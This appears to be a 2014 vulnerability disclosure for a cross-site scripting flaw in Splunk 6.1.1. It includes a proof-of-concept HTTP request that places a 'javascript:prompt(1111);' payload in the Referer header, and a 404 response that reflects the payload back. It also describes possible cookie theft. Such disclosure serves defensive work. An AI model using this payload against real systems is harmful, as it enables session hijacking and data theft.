================================================================================================================================================================ Splunk Version v6.1.1 cross-site scripting (XSS) Vulnerability ================================================================================================================================================================ #Date- 27/5/2014 # code by Asheesh kumar Mani Tripathi # Credit by Asheesh Anaconda #Vulnerbility Splunk is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. #Impact A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities ======================================================================================================================== Request ======================================================================================================================== GET /en-US/app/ HTTP/1.1 Referer: javascript:prompt(1111); User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Cookie: session_id_8000=9961be37412131609c9c4942a7bca65cc5110e6c; cval=1992808981; uid=C39F57A0-4BFB-4CD7-AAA1-4FD388E15923 Host: 192.168.1.3:8000 Connection: Keep-alive Accept-Encoding: gzip,deflate Accept: */* ======================================================================================================================== Response ========================================================================================================================
404 Not Found
This page was linked to from javascript:prompt(1111);.